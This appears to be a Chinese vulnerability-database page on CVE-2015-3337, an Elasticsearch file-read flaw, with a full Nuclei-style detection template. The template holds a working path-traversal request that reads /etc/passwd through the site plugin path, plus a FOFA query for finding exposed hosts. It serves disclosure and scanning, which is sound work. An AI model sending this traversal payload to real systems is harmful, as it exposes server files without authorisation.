CVE-2015-3337: Elasticsearch - Local File Inclusion

日期: 2025-08-01 | 影响软件: Elasticsearch | POC: 已公开

漏洞描述

Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.

PoC代码[已公开]

id: CVE-2015-3337

info:
  name: Elasticsearch - Local File Inclusion
  author: pdteam
  severity: medium
  description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/37054/
    - https://www.elastic.co/community/security
    - http://www.debian.org/security/2015/dsa-3241
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3337
    - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-3337
    cwe-id: CWE-22
    epss-score: 0.90729
    epss-percentile: 0.99603
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: elasticsearch
    product: elasticsearch
    fofa-query: index_not_found_exception
  tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100881a18519219a3678cb8cb460ac1b71ba12d08725bae71ddf15e8364396e1f10022024acd60288c3e57359d57a004a51ef0e449f208b261e6cd902572d051a86a8b2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐